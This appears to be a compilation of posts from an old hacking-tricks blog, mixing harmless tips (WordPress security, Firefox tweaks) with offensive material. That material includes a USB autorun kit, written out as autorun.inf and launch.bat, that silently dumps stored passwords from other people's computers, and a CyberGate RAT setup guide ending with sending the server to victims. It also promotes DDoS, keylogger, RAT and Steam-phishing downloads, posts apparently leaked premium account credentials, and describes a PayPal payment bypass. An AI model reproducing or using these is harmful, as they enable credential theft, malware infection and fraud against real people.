  1. Using FTP program or your webserver file manager, go to the root folder of your server and download .htaccess file (set ’show hidden files’ first if you’re using FTP program such as FileZilla)
  2. Go to your wp-admin folder
  3. Upload the .htaccess file you’ve downloaded just now.
Explanation: Prevent files in wp-admin from being accessed by hackers by limiting the access to this folder by IP address (means that the access is limited to the server owner/user only).
Thanks to ro.botys for passing us the three Wordpress security tips.
You can also disallow users pretending to be search engine/ search engines from crawling the core Wordpress folders by putting these in your robot.txt file (upload the file to root of your Wordpress installation folder when you’ve finished).
# This rule means it applies to all user-agents
User-agent: *
# Disallow all directories and files within
Disallow: /wp-admin/
Disallow: /wp-includes/

Adobe PDF Reader Speed Up

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.

 Its very simple!
1) Browse into Adobe Acrobat Reader’s program folder. Example:
C:\Program Files\Adobe\Acrobat 8.0

2) Open ‘plugins’ folder, select all (keyboard shortcut: Ctrl+A) and cut (Ctrl+X) the files to a backup folder. The idea is to let ‘plugins’ folder to be empty so that the additional features won’t load.
Test and see the result. This trick should work for Adobe Acrobat 8 or 7. via Amanz.net

Download from Rapidshare using proxy

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.

The programs that we need are a browser with ability to use proxy. I use Slimbrowser for two reasons:
  • I don’t want to delete my Firefox or IE cache and cookies files
  • It’s very lite and not a resource hogger
Steps/ How To:
Download the browser from this Free Browser . Install it.
Get a proxy list here
  • This trick requires the usage of proxy server to work. So don’t skip this step. Grab one proxy or more!
  • This is how you are going to setup your proxy:
 Click Tools > Proxies > Organize Proxies
2) In the Name field, enter something to identify your proxy, for example, Brazil #1
3) In the first address field, enter the proxy address you got from Proxy4Free, for example, 200.162.195.62
4) In the second address field, enter the proxy port, for example, 3128
5) If you want to set the entered proxy as the default proxy, then click the Set As Current Proxy button
6) Click OK to close the dialog box * If you want to add more proxies, repeat the steps above again and again.
After you have setup the proxy, copy and paste the Rapidshare download link to your browsers’ address bar, and wait for the Rapidshare page to launch.
In Rapidshare website, do the followings:
  • Press enter and scoll down to bottom and click the FREE button
  • Wait until the counter reaches zero or use any auto-reveal-link-utility – Copy paste the download link into your favorite download manager, for example, Flashget – Download the file happily
Troubleshooting
  • Note that if Rapidshare gives you error like this;
  • This IP is not allowed to use free anonymous services..or Your IP, xxx.xxx.xxx.xxx is downloading a file…

  • It’s time to use another proxy!!! In Slimbrowser, go to menu, Tools > Proxies and select another proxy you already entered before
After downloading a file, don’t forget to clear your trace!

  • In Slimbrowser go to menu Tools > Internet Options to open the Internet Options applet.

  • Click both Delete Cookies and Delete Files button to wipe out all references to Rapidshare.
  • If you need to download more files, repeat all steps from 1 to 6, and hopefully you’ll be happier than ever.
Tips:
  • Do not choose proxy with port 80
  • Avoid choosing proxies addresses beginning with 195 because some of them are slow.
Here is many rapidshare proxies
luc-pascal.amenworld.com:3128
12.108.173.1:65208
12.154.3.74:16655
12.162.0.162:65208
12.40.36.72:8000
12.40.57.179:8000
12.42.38.102:8080
121.125.197.105:8080
122.103.185.182:8080
122.152.38.57:8080
122.153.119.194:3128
122.153.16.194:3128
122.153.16.66:3128
122.153.173.138:3128
122.153.173.234:3128
122.153.173.26:3128
122.153.210.130:3128
122.153.7.130:3128
122.153.71.194:3128
122.203.23.194:3128
122.203.24.194:3128
122.208.164.253:8080
122.212.111.204:8080
122.215.21.14:8080
122.252.226.67:80
122.252.229.237:80
123.14.233.72.static.reverse.ltdomains.com:80
123.176.7.37:8080
123.176.84.27:8080
123.236.99.30:8080
123.242.234.95:8080
124.109.130.185:8080
124.138.172.2:3128
124.207.226.46:2835
124.38.175.27:8080
124.81.119.2:8080
125.101.84.47:8080
125.129.140.211:8080
125.137.44.4:2301
125.14.156.206:8080
125.190.92.250:8080
125.243.251.210:8080
125.243.98.54:8080
125.244.152.66:8080
125.244.91.2:8080
125.244.91.3:8080
125.245.19.253:8080
125.246.154.66:3128
125.246.81.62:3128
125.246.96.194:3128
125.247.113.212:3128
125.248.43.199:8080
125.248.43.201:8080
125.248.43.203:8080
125.248.43.205:8080
125.248.43.224:8080
125.248.43.225:8080
125.248.43.231:8080
125.248.43.232:8080
125.248.43.234:8080
125.248.43.236:8080
125.248.43.239:8080
125.248.43.248:8080
125.248.43.250:8080
125.248.43.253:8080
125.251.46.2:3128
125.46.36.223:808
125.65.77.73:80
125.7.44.167:3128
125.99.41.97:6588
127.0.0.1:3128
128.10.19.52:3124
128.112.139.71:3128
128.112.139.72:3128
128.112.139.73:3128

Brute Force AIO Cracker Tools

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.



# Word/Combo List
-2006 Combos
-CCBill Combos
-CCBill Combos 2
-Assorted List
-Assorted List 2
-Assorted List 3
-Killer List
-Long List
-Mature List
# Cracking Tools
-WWWHack
-Acces Driver
-Sentry20
-Brutus
-Ares
# Proxy Tools
-Forum Proxy Leecher
download http://rapidshare.com/files/157999136/BrteFrceAIOBBsGift.rar

[HF]Steamy Cloudz - Rev 120

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.


 [HF]Steamy Cloudz - Rev 120
Login,acces to account and add any game to your steam acc !
Picture
http://www.dodaj.rs/f/1Q/10P/1OL7DHow/hfsteamy-cloudz-rev-120.jpg
VirusScan
File Info
Report generated: 13.8.2009 at 23.58.44 (GMT 1)
Filename: [HF]Steamy Cloudz - Rev 120.exe
File size: 92 KB
MD5 Hash: 08d91ee8206bf87d264cc0f6f55330da
SHA1 Hash: D95E4938C6AF3D3C32C69E2604821925DCDE4342
Self-Extract Archive: Yes => RarSFX Archive
Binder Detector: File is possible binded with malware
Detection rate: 2 on 22
Detections
a-squared - -
Avira AntiVir - TR/Dropper.Gen // This is because it 'create and writes' to a file (wich is the phisher itself)
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - Suspicious // I dont know why it shows this but if you dont thrust the app, then run it on vmware or dont run it at all
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Download

Code

http://rapidshare.com/files/268144392/_HF_Steamy_Cloudz_-_Rev_120.rar

How to hack passwords using USB Drive?

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.

This Will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer.
We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it:
Code:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it:
Code:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
 

MS-DRT Trojan2.21 RAT

cIts content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.


MS-DRT Trojan RAT The new concept of remote control software architecture, including domestic and international, some excellent use of architectural concepts. Entirely through the firewall and a variety of security software. And support for reverse connections, do not need to know the server's IP address of the remote management that can be used to achieve a variety of network environments. Without a back door server program, the algorithm in all the world's leading encrypted data transmission, to ensure maximum security of the server computer. Convenience of a full-featured remote control allows you to fully enjoy the fun of document management.
【1】 File Management
【2】 screen monitors
【3】 key logger
【4】 System Management
【5】 session management
【6】 Video Surveillance
【7】 voice monitoring
【8】 EXE plug-in
【9】 3389 pairs of open -
【10】 Agent Function
【11】 port mapping
【12】 perfect support for Unicode
【13】 to add API Search Engine
【14】 through LAN proxy
【15】 export public network IP list
【16】 cluster control
Low-power monitoring capabilities, allows you to ease operation
Software with the screen monitor and camera monitoring capabilities, the use of this feature to the computer's configuration requirements is not high. Network transmission are high compression ratio of compression algorithms. Makes the network data packet transmission optimization to further improve overall performance and controllable. The control client will automatically clean up the memory, will take up memory space without the need for time to release and clear, so that program memory
Download
http://www.hackju.cn/eng/sales.htm

MS- DDOS AttackV2.0 free version

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.



MS- DDOS AttackV2.0 free version
MS_Attack V2.0 free DDOS Introduction:
n this is a Denial of Service DDOS stress testing software MSN_Zombie attack DDOS) etwork traffic control and system control technology costs, speed, do not plug, hidden, and powerful attacks, such as outstanding performance characteristics, can fully exploit the weaknesses of the target audience, with the DDOS-DDOS DDOS Firewall (introduced later) to be protective. The protection of corporate Web site or host security.
Strong performance of the attack
Support for custom packet TCP / UDP attack to attack in support of conventional host, such as multiple TCP connections / UDP floods at / ICMP / IGMP / SYN, etc. to support the Web site attacks, such as HTTP and more connected / HTTP download / FTP multi-connection / FTP download / CC attacks in support of win98/2k/xp/xp-sp2/vista system.
Automatic on-line chickens
A variety of ways to support the on-line mechanism for the broilers, such as Dynamic Domain Name / URL steering / FTP upload documents IP / fixed IP and so on, through a simple configuration can be automatically generated on the server. Server has powerful features automatic re-connection will be able to automatically search for hosts outside the network address, the automatic use of agents, to support the LAN control, never dropped.
Hidden performance
Encryptionthe protection of client services can be injected into any process, such as explorer, svchost, etc., NT system service can be generated automatically activated disguised.
First-class attack speed
Server-side part of the code directly from the completion of the compilation, in order to protect as much as possible at the same time functional compact, perfect attack speed by optimizing the speed and thread, to enhance the capacity of the best attack
Welcome to the forum: www.hackjllm.cn
http://www.hackju.cn/2.jpg
Sorry for my poor english
Download Address:
http://www.hackju.cn/msn.rar
Hello, can be customized professional business version of DDOS attack code written by an independent anti-virus software can not be killed but also a more formidable power ..... super cheap price of more powerful than others are discount software cheap attacks.
Contact my MSN: hackxf@live.cn Thank you!
MS-DDOS attack latest version of an increase of remote file management. Video surveillance. Screen monitor. Advanced features such as remote shell ...
The intensity of attacks is a free version of the 3-fold, and supports 16 kinds of super-network attacks
by
Details please visit: http://www.hackju.cn/eng/sales.htm

Free 100% Fud -!Spartan!Keylogger-Steal No-Ip(windowslive)

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.


http://i43.tinypic.com/e7x8a8.png
http://i44.tinypic.com/2ch9e1s.png
http://i42.tinypic.com/k975nm.png
!Features!
[x] AntiVirus Killer
▬AntiKeyscrambler
▬AntiMalwarebytes
▬AntiOllydbg
▬AntiOutpost
▬AntiNorman
▬AntiBitDefender
▬AntiNOD32
▬AntiZoneAlarm
▬AntiHi jackthis
[x] Get Active Window
[x] Supports Windows Live
[x] Uses Hooks [Less CPU]
[x] Steals No-IP Information
[x] Built-In File Pumper
[x] FUD Builder!
[x] FUD Stub!
[x] FUD Servers!
[x] Test Email Connection!
Virus Scans
Builder.exe
http://i44.tinypic.com/t4xuzc.png
Stub.exe
http://i40.tinypic.com/260skut.png
Server.exe
http://i44.tinypic.com/211me8n.png
Download Link!
http://www.megaupload.com/?d=L7YM4UP0

How to Delete Friendster Account

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.



Its easy! just follow the simple steps below to delete your Friendster account. Log in to your existing Friendster account. Click on “settings” on the top right hand corner of the screen. Scroll down the page and click on the left buttom and see  “cancle account”. A new screen will appear asking for confirmation where as you will have to enter your e-mail address and password details. After you’ve finished, click ‘proceed’ button and your account will be deleted.

*Please not that this change is permenant and you won’t be able to retrieve your Friendstep account back after that. And by the way, anyone knows how to hack a Friendster account here? Share your knowledge buddy..

100% WORKING PREMIUM ACCOUNT IN HOTFILE

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.


HOTFILE.COM USER=YoungTR
PASS=103610691994
Username: 1rongr
3782144
AccType : Premium
Expiry : 2010-03-14
Credits : $0
Username: stirl007
20012001
AccType : Premium
Expiry : 2010-03-20
Credits : $0
I can even hack this account completely but i will not do this and i am also requesting
you to not do so because how you feel if someone will hack your account?

Speed up mozilla firefox

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.



ozilla Firefox, Speed it up! Speed up Mozilla FireFox
--------------------------------------------------------------------------------
1. Type "about :config" in the adress field.
2. Set the value of network.http.pipelining to "true".
3. Set the value of network.http.pipelining.maxrequests to "100".
4. Set the value of network.http.proxy.pipelining to "true"
5. Set the value of nglayout.initialpaint.delay to "0" (not availible in newer versions)

Fix up Croupt files of XP window without installing it

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it


Sometimes when you are executing some program an error comes saying that your xxx file is corrupted so we can not run your program and your whole work is left pending due to that error. Now this problem will not arise because I will show you how to fix these corrupted files. Required:
1. Windows XP operating system
2. Windows XP cd
Now, follow this steps:
1. Place the xp cd in your cd/dvd drive
2. Go to start
3. run
4. type in 'sfc /scannow' (without the ')
Now it should all load, and fix all your corrupted file on win XP.

Enjoy this 100% working trick

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.



Go to Code:
Code:
http://www.google.com
2. Click "images"
3. Fill in "bikes, flowers, cars" or any other word.
4. You will get a page with alot of images thumbnailed.
5. Now delete the URL on the addressbar
6. copy and paste this javascript in and hit enter 1. javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images ; DIL=DI.length; function A(){for(i=0; i
2. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.tan(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.tan(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
3. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i
4. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);
5. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*1+i*x2+x3)*x1+x2)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);


Monday, June 28, 2010

Download From A Paypal Site Without Paying Anything

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.





Download From A Paypal Site Without Paying Anything!
Just a little basic html tip for those who are trying to download an application from sites which has an paypal order page & link to start you off.
Use a proxy when you try this to hide your ip as some sites will record your ip when you connect for security.
1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link
This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

CyberGate R.A.T [Hacktool]

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.


Hello, Today i will show how to set up Cybergate RAT. Pics Included. Firstly, Start off by downloading Cybergate RAT:
Here:
Code
http://www.multiupload.com/5FEME83544
Now, Go to No-ip.com
Sign Up and everything. now log in and press Add Host
Now name your host to whatever you want.. i will name my host to Cocacolanerds.no-ip.biz. Just follow theese settings and press Create Host.
Congratulations! You are done with The No-Ip! smile
Let's move on with the Cybergate RAT
Open Up Cybergate.. (Wich you downloaded in the beginning)
Now click Control Center - Start
Click Control Center - Options - Select Listening Ports And Do Following:
Good, You Are Done With The Settings! Now, let's move on to the Virus Creation :).
Click Control Center - Builder - Create Server. Make a new User named Hacking. Press Ok.
Mark the user "Hacker" And press Forward.
Now you should have something like this;
Press 127.0.0.1 | Port 999 and press Delete..:
After that, Click Add.
Now, A Box should pop up saying: 127.0.0.1:81. Like this:
Remove everything and change it with the No-ip adress you host you added.. So let's say you used example.no-ip.biz. Change 127.0.0.1 to example.no-ip.biz and the :81.. Since we used port 82, Change :81 to :82, so it should look like this:
But since my No-ip adress was cocacolanerds.no-ip.biz, i have to change it to MY. but i keep the :82...
Now Change the
Identification: remote
Password: cybergate
To This:
Identification: Cyber
Password: 123456
Good! You are now done with that :). Let's move on to "Installation"
Use the Exact same settings as i do. :
Good, We Skip Message. We Skip Keylogger. In the Anti Debug Have everything checked
In The Build Server: Use Google Chrome Passes and UPX.. (Makes the server smaller)
And press Create Server. Good, You do now have your RAT server complete!
How to port forward..
Go to Portforward.com and lookup your Router, there shall be a guide on how to port forward on it :). and if you are on a modem.. then you don't need to port forward.
Enter Start - Run . Command. Type Ipconfig
In the "Standard Gateway", That is your Router IP. Type that into your web browser. Log in, And Port forward port: 82
Restart your router and you are done! :).. Just send the RAT Server to any victim OUTSIDE your network.

Access to web without registering

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.








Free Access To Websites Without Registering Go to
-http://bugmenot.com/
and type the URL of the website you want to log into.
Examples:
-http://www.nytimes.com/, -http://www.winnetmag.com/
etcetera.
Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+
-http://www.googlebot.com/bot.html
This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from
-http://www.chrispederick.com/work/firefox/useragentswitcher/
and add the Googlebot user agent.

Break an adimistrators password in Windows

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.







Every time windows is about to boot, you can press F8 and change the boot options:
Safe Mode, Safe Mode with command prompt and normal boot.
Before booting, press F8. The Windows login screen will show another account: Administrator
If the owner of the PC forgot to put a password to the main administrator, you can access that account and remove the others' passwords, or do all the changes from there so that nobody will know it was you.

hacker ' Software

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.










This is the first lesson in the world hack. Further you can find and learn the elemntare things to know every hacker beginner! Although there are some things you know not complicated, they are very useful and I am sure that you will use and further ahead in your hacker! Any hacker tools!
Here I describe the arsenal of a hacker, even if it's beginner! I think these tools will be useful in further!
- Brute Force
- Port Scanner
- Security scanner
- Joiner
- Mail Bomber
- Breaking Windows passwords
- View passwords
- Trojan
- Keylogger
- Hiding IP (proxy / socks)
So we start on row ...
Brute Force
Brute Force - Uses passwords to downloading e-mail, ftp-servers and others ... There are several types of brute force programs, giving them more common functions. When using brute force connections to less than 56 kb that is dial-up download passwords can be very long ... and when using ADSL, fiber optics or satellite descarea takes place much faster, in turn eat the more traffic. The optimal solution is to download the password through the lists of passwords. Hacker draw up a text file in which passwords are located all possible target, the program connects to the server and pointed to choose the start line of the fillet text passwords with passwords (list). Deasemnea these lists of passwords can be primitive, that is when urmaeaza as the ab-abc-ABCD-ABCD ... up to a length of 10-30 GB! Also with dictionaries or lists of passwords, as they say in May, is more difficult to nimereasca and password, but it is very effective! If the attack takes place on an e-mail, it is necessary to point brute force the server data entry. Eg if we want to break postal address - e-mail server of the data entry will be: pop.hacksome.md. And if not break e-mail address but www.hacksome.md site, then you have to show program brute force ftp-server of this site: Brute Force ftp.hacksome.md programs still have many useful features like password if you know the person is 5 caractrere the first letter is L, then you can use the password after downloading mask: L ####. Among the best programs are Brute Force: AET2 Brutus, wwwHack and others. For example, today more email service programs have brute force, hackers created especially for them!
Port Scanner
Programs that scan a range of IPs with an open port indicated is called port scanners. If the scanner will find an IP address with that port open, it will be added in your list also, there is only scanners intervals ip addresses. Where to use these scanners? Sometimes creators will include a Trojan scanner port their creations. This is because the server heap (fillet must stay in the target computer) in reaching your sacrifice, open a port in system, whereby the customer receives commands (hackers). For those who still do not know: if you know which port is lagatura with our wall, with ports scanner wondering after every computer IP address if the port is open or not. When the scanner finds addresses to open the port means that the computer that already sit in a heap of our sin is we can connect to it! Among the best scanners and the alpha Essentional Net Tools and a simple but very useful - Angry IP / Port Scanner.
Security Scanner
All the Internet there are two main types of websites: static [html] and dynamic [php]. If the pages are written in html page where the content does not matter to ordinary users and always remain unchanged - static. Pages dynamic process data received from users, that is if you can think to express. Hence we conclude that static pages can not be any security holes. These holes exist only in dynamic pages. The most widespread vulnerabilities are XSS. To find security holes, using scanners securiatii. The best time to be XSpider and Shadow Security Scanner.
Joiner
In English, means to unite join, connect. Joiner is a program which enables to join or glue several fillets in a single file system have changed the icon. Thus, using hacker Joiner can paste a server with a heap of useful file system inmine of its target. In turn, or when launching the target program that thinks it is useful to automatically launch and wall ... Through Joiner you can join in a file up to 255 fillets! Joiner is a minus - it can be detected by antivirus. The problem can be solved if you buy a private Joiner because joinerele public are not so good!
Mail Bomber
This type of program is to bombard the e-mail .. that is sending several hundreds or even thousands of letters to a postal address! Bomber mail programs are used widely by spameri. Thus, when sending too many letters (can reach hundreds of thousands and thousands!), Post the target can not process information venita suddenly and in large quantities, so the error or even delete this address. I personally against spamerilor! But if you will need, you can use Ganja Spammer or any other .. Only in exceptional cases!
Breaking Windows passwords
I think the best programs for handling passwords are PasswordsPro, MD5Inside, PWLInside, SAMInside. All these programs are produced by InsidePro. But to invelege better, I read a little to write about them.
SAMInside - a program to break fillets SAM. Windows 2K/XP, all passwords are kept in windows \ system32 \ config, and is called SAM and SYSTEM - without extension. To copy them to decipher them, you need dos or another .. To begin to figure out, you need copies of them. Later they open with SAM Inside indicated descifrarii way and wait. Soon you will read the password!
PWL Inside - is practically the same as the previous program, only that is used to decode fillets from Windows 95/98, where passwords are fillet with a. Pwl Windows directory.
MD5Inside - with its passwords can decode MD5-hash that is used in many systems of authorization. After decipher the password hash you have time. For example, in forums such Invision Power Board hash contained in cookies. More about cookies read on our website.
PasswordsPro - is a very powerful tool for working with passwords. Are all functions MD5Inside, generates hash, passwords can view what is under the stars ***. It is very useful for any hacker!
View password
If you what your colleague has the password, it is very easy to learn. When you are in hospitality at it, send to make a coffee, and you in this time, remove programs that shows all the passwords from messengere, mail and more! I think that magic?)) It consists in the fact that for more convenience, was made after approval your password is saved in the browser, icq, messenger or mail. This vulnerability is a pretty big! There are many programs that show all types of passwords saved in your computer. To view the passwords of Internet Explorer and Outlook Express, use PSPV program. For TheBat - TheBat PasswordViewer for ICQ / Trillian / Miranda and others - Advanced Instant Messenger Password Recovery or AIMPR. Thus, without any problems to put hands on passwords!
Trojan
Here I come to you and more interesting. This type of program hack, was so called because it works like famous Trojan horse. Once inside the target computer, couch and sit there quietly. He does absolutely nothing if you do not receive the command from the creator or (hacker who sent). But he gets terribly when it starts to come hacker commands from the network (LAN) or Internet! It can send all your passwords hackers if it receives the order or work with your fillets or register. I understand the idea that it can have very high although all have different ways! Most popular today are Trojan: Pinch, Xinch, a311 and many others ...
Keylogger
Keylogger is a spy of the keyboard. It records all keyboard and push them into a file. When the connection to the Internet, this file is sent to hacker or save them in there somewhere on your hard disk. It is an ideal tool if you want to know what type your friend via icq or messenger.
Proxy
If you do something not legal, I do not think you want to leave your real IP address .. then you find you easily. But those did so in case? There are so-called proxy servers and socks servers. The trick is that this proxy you change your ip real. I mean, you connect to the proxy server, and all orders do not go directly to that site but the first proxy server, which fulfills the order and send you only the result here! Thus, leaving the proxy server is working for you, and you stay anonymous! Also, if you have your ip address banned by prozy come without problems! In general, if you have problems because of IP address, use the proxy and everything is solved! Good programs to work with the proxy are: A4proxy, ProxySwitcher.
 

How to Hack a soda machine(Hard)

Its content is based on I have known, produced, searched and the other is done and posted by other websites and that is credited to original posted and make it.



THIS MIGHT NOT WORK YOU MIGHT WASTE YOUR TIME DOING THIS, AS "Coca-Cola" HAS DISTRIBUTED NEW FIRMWARE TO THEIR VENDORS THAT WOULD MAKE THESE INSTRUCTIONS USELESS.(don't be shy comment) Steps
Find a machine that has an LED screen and that is by "Royal Vendors". There should be a label on both sides of the machine. The small screen will typically scroll a message such as "Ice Cold Cokes". If the machine's LED display simply displays the price, the steps below may not work.
Enter the access code by using the drink selection buttons. The default access code is 4, 2, 3, 1, but the buttons aren't numbered. They will either say nothing or have pictures of Coke, Diet Coke, Sprite, and other Coca-Cola products on them.
If the buttons are in a column, button 1 is the top one. Button 2 is the second one from the top, and so on.
If they are in a grid or other format, button 1 is the top left one. Button 2 is the one directly to the right of that, and so on.
Scroll through the menu to find out information about the machine. Once you enter the correct access code, the message on the LED screen will change. Typically it will say "EROR," but on some machines it may simply display a number. Use the buttons to navigate through the menu.
Press button 1 at any time to return to the previous menu or to exit the menu to go back to normal mode.
Press button 2 to scroll up through the selections.
Press button 3 to scroll down through the selections.
Press button 4 to select the displayed menu option.
Example Menu Options
EROR: This menu option displays error messages for the machine, including problems that occurred with the refrigeration system, the vending mechanism, the bill changer, and the bill validator. To see error messages, press the select button (button 4) when the display shows EROR, and then scroll through to see specific errors. Select an individual error to see more details. Generally if only one type of error has occurred you won't be able to scroll through other error options.
CASH: This option allows you to see the machine's total historical cash intake, as well as the resettable cash counted for each drink selection. Press the select button when the the LED display shows CASH. This will show you the historical cash counted by the machine. Note that it will include fractions of a dollar, such that if it displays 1452425, the historical cash count is $14,524.25. Use the scroll buttons (2 or 3) to navigate to the cash counts for each slot (each beverage selection). The number displayed will show first the slot number and then the revenue for that slot number since the last time the counter was reset. In some machines, it will be preceded by the letters CA or SL (for "slot").
SALE: This option allows you to see the machine's historical total number of sales, as well as the resettable number of sales for each drink selection. It works like the CASH menu above, except that the numbers displayed reflect the number of beverages sold.
RTN: Sometimes labeled EXIT, this option stands for "Return To Normal" and allows you to exit the menu completely and return the machine to normal mode. Press the select button to exit.
Alternate Menu
On machines with two panels of six buttons on each side, the same 4-2-3-1 code will access the Electronic Counter for the machine. After accessing this menu, press 1 to see the total lifetime sales, 2 for the total lifetime items sold, 3 for a breakdown of items sold of each selection, 4 for a breakdown of cash generated for each selection, and 5 for the machine's internal temperature. After a while without input, the machine will return to the normal menu. On some machines, the 6 button will close the menu.
Tips
This only works for Coke machines, which may sell products such as Barq's Root Beer, Sprite, Dasani, Evian, Fanta, Fresca, Frutopia, Full Throttle, Powerade, Hi-C, Minute Maid, Nestea, Odwalla, Mr. Pibb, Planet Java, Seagram's Ginger Ale, Simply Orange, Sparkletts, or Tab in addition to Coke and Diet Coke.
This hack also usually works on machines that sell just Dasani water - a product of the Coca-Cola company.
In general, these are the only options you can access without having the door unlocked and open. Different machines may list these options in somewhat different formats, so experiment a bit to learn what each new one does.
If you need to exit the menu quickly (i.e. when you just can't wait another second to buy an ice cold Coke) press the change (coin return) button. This will normally quit the menu.
On some machines, holding the coin return button will display the machine's inner temperature.
Vending machine owners or service people have the option to change the access sequence from 4231 to some other combination of buttons, but they rarely do. This is probably because having one code makes it easier for anyone to service all the machines along a route. It may also be because the information you can access through the external menu with the door closed is limited and fairly harmless.
There are several videos available on the Internet that show people using this hack. Many claim to be able to change prices or get a free drink, but the videos don't actually show them doing so.
In order to get to the same menu in a machine that sells Pepsi products, simply enter 1,3,2,4. All the menu options should be the same. (This does not work on all Pepsi machines)
